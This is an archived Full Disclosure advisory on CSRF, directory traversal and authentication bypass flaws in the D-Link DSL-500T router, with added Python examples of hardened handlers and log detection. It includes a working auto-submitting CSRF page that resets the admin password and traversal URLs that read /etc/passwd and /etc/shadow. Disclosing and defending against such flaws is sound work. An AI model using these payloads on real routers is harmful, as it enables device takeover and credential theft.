Full Disclosure mailing list archives

CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router


From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 20 Dec 2011 01:28:21 +0200

Hello list!

I want to warn you about new security vulnerabilities in the D-Link DSL-500T 
ADSL Router.

These are Cross-Site Request Forgery, Directory Traversal and Authentication 
Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced 
and will be disclosed later, after giving D-Link time to fix those 
vulnerabilities) in a series of advisories about vulnerabilities in D-Link 
products.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DSL-500T, firmware 
V1.00B02T02.RU.20050223. Other firmware versions of this model are also 
vulnerable, and other D-Link router models may be vulnerable as well.

----------
Details:
----------

CSRF (WASC-09):

All functionality of the router's admin panel is vulnerable to CSRF. For 
example, the following CSRF request changes the administrator's login and 
password.

D-Link DSL-500T CSRF.html

<html>
<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm" method="post"
enctype="application/x-www-form-urlencoded">
<input type="hidden" name="getpage" value="../html/tools/usrmgmt.htm">
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm" 
value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>
</body>
</html>

All other functions in the admin panel are also vulnerable to CSRF. Combined 
with XSS and the Directory Traversal described below, this would make it 
possible to read arbitrary files from the router remotely.
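The page above works because nothing ties the POST to a page the router itself served: the browser attaches the admin session cookie to any request for 192.168.1.1, whoever caused it. The following added example (my illustration, not the DSL-500T firmware or a vendor patch) models the handler behind /cgi-bin/webcm as the advisory describes it, then the same handler with a per-session anti-CSRF token and an Origin check, and drives both with the exact field set from the exploit form. The session object, the handler functions and the attacker origin are assumptions for the demonstration.

```python
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

# The router's origin from the advisory; everything else in this file is an
# added illustration, not the DSL-500T's real firmware code.
ROUTER_ORIGIN = "http://192.168.1.1"

# The hidden fields posted by the advisory's "D-Link DSL-500T CSRF.html".
EXPLOIT_FORM: Dict[str, str] = {
    "getpage": "../html/tools/usrmgmt.htm",
    "security:settings/username": "admin",
    "security:settings/password": "password",
    "security:settings/password_confirm": "password",
    "security:settings/idle_timeout": "30",
}


@dataclass
class AdminSession:
    """A logged-in admin session (assumed model). The browser sends the session
    cookie with every request to 192.168.1.1, including a POST that a page on
    another site auto-submits, which is the whole CSRF problem."""
    username: str
    password: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def webcm_vulnerable(session: AdminSession, form: Dict[str, str],
                     origin: Optional[str]) -> bool:
    """Model of the behaviour the advisory describes: any POST that arrives
    with a valid session is applied; the Origin of the request is ignored."""
    if form.get("getpage") != "../html/tools/usrmgmt.htm":
        return False
    if form.get("security:settings/password") != form.get("security:settings/password_confirm"):
        return False
    session.username = form["security:settings/username"]
    session.password = form["security:settings/password"]
    return True


def webcm_hardened(session: AdminSession, form: Dict[str, str],
                   origin: Optional[str]) -> bool:
    """Hypothetical fix with two independent checks: the Origin header must
    name the router itself, and the form must carry the per-session token the
    router embedded in its own usrmgmt.htm. A cross-site page can make the
    browser send the cookie, but it can neither read the token nor forge the
    Origin header."""
    if origin != ROUTER_ORIGIN:
        raise PermissionError(f"rejected cross-origin or missing Origin: {origin!r}")
    supplied = form.get("csrf_token", "")
    # Constant-time compare so the token cannot be guessed byte by byte.
    if not secrets.compare_digest(supplied, session.csrf_token):
        raise PermissionError("missing or wrong anti-CSRF token")
    return webcm_vulnerable(session, form, origin)


Handler = Callable[[AdminSession, Dict[str, str], Optional[str]], bool]


def run_attack(handler: Handler, origin: Optional[str], with_token: bool) -> AdminSession:
    """Submit the exploit form to one handler against a fresh session and return
    the session, so the caller can see whether the password was changed."""
    victim = AdminSession(username="admin", password="original-secret")
    form = dict(EXPLOIT_FORM)
    if with_token:  # only a page served by the router could know this value
        form["csrf_token"] = victim.csrf_token
    try:
        handler(victim, form, origin)
    except PermissionError as exc:
        print(f"{handler.__name__}: rejected ({exc})")
    return victim


if __name__ == "__main__":
    attacker = "http://attacker.example"  # assumed origin of the hostile page
    print("vulnerable, cross-site    :", run_attack(webcm_vulnerable, attacker, False).password)
    print("hardened, cross-site      :", run_attack(webcm_hardened, attacker, False).password)
    print("hardened, legitimate form :", run_attack(webcm_hardened, ROUTER_ORIGIN, True).password)
```

Checking Origin alone is not enough on its own for a device like this: older browsers omit the header on some requests and the router would have to decide whether "missing" means reject. The token check carries the defence; the Origin check is defence in depth.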

Directory Traversal (WASC-33):

In 2006 a DT vulnerability was found in other D-Link router models 
(CVE-2006-2337). It also exists in this model, as I've checked (but unlike 
the description of DT in the other models, in my model authentication is 
required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Arbitrary files can be read from the router, but only after authentication.
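Note that the router's own pages already pass a one-level ".." in getpage (the CSRF form above uses ../html/tools/usrmgmt.htm), so webcm evidently resolves the parameter relative to its CGI directory and never checks where the result lands. The following added example (my illustration, not the router's code) models that unsafe resolution beside a hardened version that confines the result to the page directory; the directory layout /usr/www/cgi-bin and /usr/www/html is an assumption chosen so that the advisory's legitimate value resolves cleanly.

```python
import posixpath

# Assumed directory layout (not stated in the advisory): the CGI lives in
# /usr/www/cgi-bin and the pages it serves live in /usr/www/html, so the
# advisory's normal value "../html/tools/usrmgmt.htm" is itself a one-level
# "..", i.e. webcm resolves getpage relative to its own directory.
WEB_ROOT = "/usr/www"
CGI_DIR = posixpath.join(WEB_ROOT, "cgi-bin")
HTML_DIR = posixpath.join(WEB_ROOT, "html")


def resolve_vulnerable(getpage: str) -> str:
    """Unsafe resolution: join and normalise, no containment check.

    posixpath.join discards CGI_DIR entirely when getpage is absolute, so
    getpage=/etc/passwd becomes /etc/passwd; '..' segments are honoured, so
    enough of them climb out of /usr/www as well.
    """
    return posixpath.normpath(posixpath.join(CGI_DIR, getpage))


def resolve_safe(getpage: str) -> str:
    """Hardened resolution: resolve the same way, then require the result to
    be a file under HTML_DIR. Raises ValueError for anything else.

    The trailing "/" in the prefix test matters: a bare startswith(HTML_DIR)
    would also accept /usr/www/html2/... or /usr/www/htmlx.
    """
    if "\x00" in getpage:
        raise ValueError("NUL byte in getpage")
    resolved = posixpath.normpath(posixpath.join(CGI_DIR, getpage))
    if not resolved.startswith(HTML_DIR + "/"):
        raise ValueError(f"getpage escapes {HTML_DIR}: {getpage!r} -> {resolved}")
    return resolved


def classify(getpage: str) -> str:
    """One-word verdict from the hardened resolver, for tabulating inputs."""
    try:
        resolve_safe(getpage)
        return "allowed"
    except ValueError:
        return "blocked"


if __name__ == "__main__":
    # The two values from the advisory plus constructed variants.
    for value in ["../html/tools/usrmgmt.htm", "/etc/passwd", "/etc/shadow",
                  "../../../etc/shadow", "../html/../../../etc/passwd"]:
        print(f"{value:30} vulnerable -> {resolve_vulnerable(value):32} hardened -> {classify(value)}")
```

On a real filesystem the string check should be followed by os.path.realpath on the resolved path and a second containment test, so that a symlink inside the page directory cannot point the CGI back outside it.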

Authentication Bypass (WASC-01):

In 2005 an AB vulnerability was found in other D-Link router models 
(CVE-2005-1680). It also exists in this model, as I've checked.

Commands can be sent to the firmwarecfg application without authentication. 
This allows, for example, retrieving the configuration file containing the 
administrator's login and password, and thus gaining access to the admin 
panel.
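Until the firmware is fixed, the practical control is to watch the two endpoints named in this advisory. The following added example (my detection logic, not part of the advisory) runs two rules over constructed access-log lines: any request to /cgi-bin/firmwarecfg is flagged, since the advisory says that application accepts commands without authentication, and any webcm getpage value that resolves outside the page directory is flagged as traversal. The Apache-style log format, the client addresses and the directory layout are assumptions; the DSL-500T's own log format is not given on this page, so adapt LINE_RE to whatever your collector records for the router.

```python
import posixpath
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumed layout (not given in the advisory): webcm resolves getpage relative
# to /usr/www/cgi-bin and legitimate pages live under /usr/www/html.
CGI_DIR = "/usr/www/cgi-bin"
HTML_DIR = "/usr/www/html"

# Constructed sample lines in Apache "combined"-style format: the legitimate
# request from the CSRF form, the two traversal URLs from the advisory (one of
# them percent-encoded) and one hit on the unauthenticated firmwarecfg app.
SAMPLE_LOG = """\
192.168.1.23 - - [17/Dec/2011:10:01:02 +0200] "GET /cgi-bin/webcm?getpage=../html/tools/usrmgmt.htm HTTP/1.1" 200 2311
192.168.1.23 - - [17/Dec/2011:10:01:09 +0200] "GET /cgi-bin/webcm?getpage=/etc/passwd HTTP/1.1" 200 512
192.168.1.23 - - [17/Dec/2011:10:01:15 +0200] "GET /cgi-bin/webcm?getpage=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 640
192.168.1.77 - - [17/Dec/2011:10:02:40 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def getpage_escapes_html(getpage: str) -> bool:
    """True when an already URL-decoded getpage value resolves outside HTML_DIR.
    The one-level '../html/...' the router's own pages use stays inside; an
    absolute path replaces CGI_DIR entirely and deeper '..' climbs above it."""
    resolved = posixpath.normpath(posixpath.join(CGI_DIR, getpage))
    return not resolved.startswith(HTML_DIR + "/")


def detect(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Apply both rules and return one alert dict per suspicious request."""
    alerts: List[Dict[str, str]] = []
    for raw in lines:
        rec = parse_line(raw)
        if not rec:
            continue
        url = urlsplit(rec["target"])
        base = {"client": rec["client"], "ts": rec["ts"], "target": rec["target"]}
        if url.path == "/cgi-bin/firmwarecfg":
            # The advisory: firmwarecfg takes commands without authentication,
            # so every hit on it deserves review regardless of method or status.
            alerts.append({**base, "rule": "firmwarecfg-access"})
            continue
        if url.path == "/cgi-bin/webcm":
            # parse_qs percent-decodes, so ..%2F..%2F is inspected as ../../
            for value in parse_qs(url.query).get("getpage", []):
                if getpage_escapes_html(value):
                    alerts.append({**base, "rule": "webcm-getpage-traversal", "getpage": value})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(f"{alert['ts']} {alert['client']} {alert['rule']}: {alert['target']}")
```

Because the traversal on this model only works after authentication, a traversal alert from an address that also appears in successful admin logins is the case to prioritise; a firmwarecfg alert needs no such correlation.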

------------
Timeline:
------------

2011.12.17 - disclosed at my site.

I mentioned these vulnerabilities at my site 
(http://websecurity.com.ua/5581/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/